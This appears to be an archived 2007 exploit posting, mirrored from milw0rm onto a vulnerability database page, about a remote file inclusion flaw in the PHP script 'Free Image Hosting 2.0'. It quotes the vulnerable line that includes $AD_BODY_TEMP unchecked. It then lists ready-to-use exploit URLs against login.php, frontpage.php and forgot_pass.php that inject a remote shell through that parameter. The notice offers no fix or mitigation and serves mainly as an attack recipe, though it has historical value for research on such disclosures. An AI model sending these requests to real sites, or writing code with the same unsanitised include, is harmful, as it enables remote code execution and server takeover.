Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16478
HistoryMar 25, 2007 - 12:00 a.m.

Image_Upload Script Remote File Inclusion Exploit Free Image Hosting 2.0

2007-03-2500:00:00
vulners.com
687

############################################################################################
Baslik :Image_Upload Script Remote File Inclusion Exploit
Free Image Hosting 2.0

.ndir : http://free-php-scripts.net/scripts/Image_Upload.zip

Bulan :Crackers_Child

Zay.flk : <td><div align="center"><?php include($AD_BODY_TEMP);?></div></td>

Exploit : www.site.com/imageupload_path/login.php?AD_BODY_TEMP=Shell?

    : www.site.com/imageupload_path/frontpage.php?AD_BODY_TEMP=Shell?

    :www.site.com/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell ?

Not :[Olmek Var$a Kaderde Dert Ekleme Derdine ;) ]

Greetz : EveryBody
############################################################################################

milw0rm.com [2007-03-25]